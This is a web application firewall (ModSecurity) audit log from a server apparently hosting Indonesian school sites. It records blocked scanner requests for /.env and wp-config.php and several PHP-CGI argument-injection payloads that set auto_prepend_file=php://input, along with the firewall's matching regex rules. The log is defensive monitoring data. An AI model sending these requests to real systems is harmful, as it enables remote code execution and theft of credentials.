Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a8d21c-Z-- --bb4cfc62-A-- [15/May/2025:01:11:41 +0700] aCTc3cabX6K9rhby1vha3QAAAJU 103.236.140.4 55682 103.236.140.4 8181 --bb4cfc62-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.253.51.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.253.51.114 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bb4cfc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb4cfc62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747246301461658 862 (- - -) Stopwatch2: 1747246301461658 862; combined=303, p1=268, p2=0, p3=0, p4=0, p5=34, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb4cfc62-Z-- --b5ad3d24-A-- [15/May/2025:03:00:47 +0700] aCT2b11ltXwOneQqchOXhgAAABg 103.236.140.4 58178 103.236.140.4 8181 --b5ad3d24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b5ad3d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ad3d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747252847960661 741 (- - -) Stopwatch2: 1747252847960661 741; combined=322, p1=289, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ad3d24-Z-- --4b29db28-A-- [15/May/2025:03:00:49 +0700] aCT2ccabX6K9rhby1vh4BQAAAJI 103.236.140.4 58332 103.236.140.4 8181 --4b29db28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4b29db28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b29db28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747252849738315 898 (- - -) Stopwatch2: 1747252849738315 898; combined=392, p1=346, p2=0, p3=0, p4=0, p5=46, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b29db28-Z-- --08717337-A-- [15/May/2025:04:03:39 +0700] aCUFK35oxhgjPv2ZXtkekAAAAII 103.236.140.4 38582 103.236.140.4 8181 --08717337-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 177.223.60.82 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 177.223.60.82 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --08717337-C-- --08717337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08717337-E-- --08717337-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747256619952798 5211 (- - -) Stopwatch2: 1747256619952798 5211; combined=3232, p1=514, p2=2676, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08717337-Z-- --f07ddf78-A-- [15/May/2025:04:30:05 +0700] aCULXX5oxhgjPv2ZXtkfNQAAAIw 103.236.140.4 41330 103.236.140.4 8181 --f07ddf78-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --f07ddf78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f07ddf78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747258205111362 879 (- - -) Stopwatch2: 1747258205111362 879; combined=394, p1=352, p2=0, p3=0, p4=0, p5=41, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f07ddf78-Z-- --a410462a-A-- [15/May/2025:04:57:20 +0700] aCURwEZPp_O9UFIYjNbqhgAAANQ 103.236.140.4 41586 103.236.140.4 8181 --a410462a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.121.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.121.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a410462a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a410462a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747259840978236 786 (- - -) Stopwatch2: 1747259840978236 786; combined=315, p1=279, p2=0, p3=0, p4=0, p5=35, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a410462a-Z-- --a7c1687d-A-- [15/May/2025:05:09:40 +0700] aCUUpO8rcsLSwEaopQIT4gAAAAM 103.236.140.4 43054 103.236.140.4 8181 --a7c1687d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 160.20.104.81 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 160.20.104.81 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a7c1687d-C-- --a7c1687d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7c1687d-E-- --a7c1687d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747260580205347 4843 (- - -) Stopwatch2: 1747260580205347 4843; combined=3280, p1=492, p2=2743, p3=0, p4=0, p5=45, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7c1687d-Z-- --32de9373-A-- [15/May/2025:06:33:58 +0700] aCUoZkZPp_O9UFIYjNbrpgAAAMQ 103.236.140.4 47056 103.236.140.4 8181 --32de9373-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 119.3.154.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 119.3.154.161 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --32de9373-C-- --32de9373-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32de9373-E-- --32de9373-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747265638023370 4755 (- - -) Stopwatch2: 1747265638023370 4755; combined=3013, p1=461, p2=2512, p3=0, p4=0, p5=39, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32de9373-Z-- --8ceb962a-A-- [15/May/2025:11:31:01 +0700] aCVuBUZPp_O9UFIYjNbxEQAAAMw 103.236.140.4 54258 103.236.140.4 8181 --8ceb962a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.201.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.201.64 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8ceb962a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ceb962a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747283461664117 804 (- - -) Stopwatch2: 1747283461664117 804; combined=335, p1=295, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ceb962a-Z-- --8762331d-A-- [15/May/2025:12:13:33 +0700] aCV3_T0MuKCmW-Q80KvlvQAAAFU 103.236.140.4 55346 103.236.140.4 8181 --8762331d-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 165.232.164.254 Accept-Encoding: gzip X-Varnish: 146829124 --8762331d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8762331d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286013372010 775 (- - -) Stopwatch2: 1747286013372010 775; combined=312, p1=279, p2=0, p3=0, p4=0, p5=33, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8762331d-Z-- --6fcce401-A-- [15/May/2025:12:13:33 +0700] aCV3_UZPp_O9UFIYjNbx_QAAAM0 103.236.140.4 55578 103.236.140.4 8181 --6fcce401-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 165.232.164.254 Accept-Encoding: gzip X-Varnish: 147521796 --6fcce401-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6fcce401-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286013388657 729 (- - -) Stopwatch2: 1747286013388657 729; combined=290, p1=257, p2=0, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fcce401-Z-- --994c5524-A-- [15/May/2025:12:14:49 +0700] aCV4SX5oxhgjPv2ZXtkkBQAAAII 103.236.140.4 59768 103.236.140.4 8181 --994c5524-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 165.232.164.254 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --994c5524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --994c5524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286089479546 685 (- - -) Stopwatch2: 1747286089479546 685; combined=251, p1=219, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --994c5524-Z-- --49f3cd71-A-- [15/May/2025:12:14:49 +0700] aCV4SX5oxhgjPv2ZXtkkBgAAAIk 103.236.140.4 59770 103.236.140.4 8181 --49f3cd71-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 165.232.164.254 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 165.232.164.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --49f3cd71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --49f3cd71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286089506502 673 (- - -) Stopwatch2: 1747286089506502 673; combined=252, p1=218, p2=0, p3=0, p4=0, p5=33, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --49f3cd71-Z-- --2093d76c-A-- [15/May/2025:12:16:38 +0700] aCV4tkZPp_O9UFIYjNb1oQAAAM8 103.236.140.4 33212 103.236.140.4 8181 --2093d76c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.234 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Accept-Charset: utf-8 --2093d76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2093d76c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747286198375399 811 (- - -) Stopwatch2: 1747286198375399 811; combined=319, p1=279, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2093d76c-Z-- --368ed031-A-- [15/May/2025:12:47:41 +0700] aCV__UZPp_O9UFIYjNb1rQAAAMw 103.236.140.4 33350 103.236.140.4 8181 --368ed031-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --368ed031-C-- --368ed031-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --368ed031-E-- --368ed031-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747288061064650 4340 (- - -) Stopwatch2: 1747288061064650 4340; combined=2213, p1=534, p2=1639, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --368ed031-Z-- --1133d602-A-- [15/May/2025:15:14:28 +0700] aCWiZD0MuKCmW-Q80KsV3wAAAFE 103.236.140.4 45664 103.236.140.4 8181 --1133d602-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 Accept-Charset: utf-8 --1133d602-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1133d602-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747296868722551 787 (- - -) Stopwatch2: 1747296868722551 787; combined=339, p1=296, p2=0, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1133d602-Z-- --1c50a37b-A-- [15/May/2025:16:53:19 +0700] aCW5jz0MuKCmW-Q80Kt2VQAAAEg 103.236.140.4 51916 103.236.140.4 8181 --1c50a37b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.201.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.201.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1c50a37b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c50a37b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747302799988122 803 (- - -) Stopwatch2: 1747302799988122 803; combined=350, p1=309, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c50a37b-Z-- --baf9796b-A-- [15/May/2025:19:15:41 +0700] aCXa7e8rcsLSwEaopQLitgAAABg 103.236.140.4 47450 103.236.140.4 8181 --baf9796b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.57 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.57 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* 